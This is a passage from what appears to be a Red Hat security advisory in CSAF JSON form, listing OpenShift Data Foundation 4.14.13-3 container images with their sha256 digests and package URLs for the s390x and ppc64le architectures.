"odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", product_id: "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", product: { name: "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", product_id: "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", product: { name: "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", product_id: "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", product_id: "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", product_id: "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.14.13-3", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", product: { name: "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", product_id: "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-cli-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", product: { 